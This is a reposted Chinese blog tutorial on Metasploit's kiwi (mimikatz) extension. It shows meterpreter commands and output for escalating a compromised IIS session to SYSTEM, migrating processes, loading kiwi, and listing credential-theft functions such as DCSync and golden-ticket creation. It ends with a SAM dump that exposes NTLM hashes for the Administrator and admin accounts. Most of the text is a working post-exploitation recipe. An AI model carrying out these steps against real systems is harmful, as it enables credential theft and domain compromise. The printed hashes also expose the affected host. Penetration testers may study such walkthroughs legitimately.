KALILINUX MSF中kiwi(mimikatz)模块的使用

一、简介:

kiwi模块:
  mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

二、前权:

提权到system权限:
1.1 提到system有两个方法:
  一是当前的权限是administrator用户;
  二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限。
1.2 进行提权:

getuid      #查看当前会话用户身份
getsystem   #自动尝试提权

当前是普通权限

meterpreter > getuid
Server username: IIS APPPOOL\web

通过getsystem提权成功

meterpreter > getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA E                                              fsPotato)).

同通过ps查看进程

meterpreter > ps

Process List
============

 PID   PPID  Name                Arch  Session  User                          Path
 ---   ----  ----                ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System              x64   0
 300   4     smss.exe            x64   0
 316   616   sqlservr.exe        x64   0        NT SERVICE\MSSQLSERVER        C:\Program Files\Microsoft SQL Serve
                                                                              r\MSSQL12.MSSQLSERVER\MSSQL\Binn\sql
                                                                              servr.exe
 328   616   vsvnhttpsvc.exe     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\VisualSVN Server\bi
                                                                              n\vsvnhttpsvc.exe
 360   932   WUDFHost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\WUDFHost.exe
 396   388   csrss.exe           x64   0
 416   720   WmiPrvSE.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.ex
                                                                              e
 476   388   wininit.exe         x64   0
 484   468   csrss.exe           x64   1
 572   468   winlogon.exe        x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 580   1104  taskhostw.exe       x64   2        172_19_0_5\admin              C:\Windows\System32\taskhostw.exe
 616   476   services.exe        x64   0
 632   476   lsass.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 648   616   svchost.exe         x64   2        172_19_0_5\admin              C:\Windows\System32\svchost.exe
 720   616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 784   616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 880   572   LogonUI.exe         x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 888   572   dwm.exe             x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
 924   616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 932   616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1020  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1064  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1096  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1104  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1244  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1264  616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1276  720   ChsIME.exe          x64   2        172_19_0_5\admin              C:\Windows\System32\InputMethod\CHS\
                                                                              ChsIME.exe
 1752  616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1820  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1864  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1892  616   BaradAgent.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\Monitor\Bara
                                                                              d\BaradAgent.exe
 1968  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1992  616   sqlwriter.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Microsoft SQL Serve
                                                                              r\90\Shared\sqlwriter.exe
 2000  616   sgagent.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\Stargate\sga
                                                                              gent.exe
 2008  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2020  616   tat_agent.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\tat_agent\ta

迁移进程

meterpreter > migrate 3820
[*] Migrating from 5320 to 3820...
[*] Migration completed successfully.

加载 load mimikatz

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

通过help kiwi 查看帮助

meterpreter > help kiwi

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

一些有关密码和凭据的命令:

creds_all:             #列举所有凭据
creds_kerberos:        #列举所有kerberos凭据
creds_msv:             #列举所有msv凭据
creds_ssp:             #列举所有ssp凭据
creds_tspkg:           #列举所有tspkg凭据
creds_wdigest:         #列举所有wdigest凭据
dcsync:                #通过DCSync检索用户帐户信息
dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:  #创建黄金票据
kerberos_ticket_list:  #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use:   #使用kerberos票据
kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:          #dump出lsa的SAM
lsa_dump_secrets:      #dump出lsa的密文
password_change:       #修改密码
wifi_list:             #列出当前用户的wifi配置文件
wifi_list_shared:      #列出共享wifi配置文件/编码

直接拿到文章来源地址https://uudwc.com/A/12oGr

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : 172_19_0_5
SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
Local SID : S-1-5-21-3925609119-1055855973-2504285507

SAMKey : a7560bed1540bf80158f27e92e672d72

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 3f10b4bc33875a54c357b013abdbbb6e

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000003f1 (1009)
User : admin
  Hash NTLM: 4b37422333f67ebc8778d798ad2af741

原文地址:https://blog.csdn.net/u010025272/article/details/132816216

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

上一篇 2023年09月15日 02:01
下一篇 2023年09月15日 02:01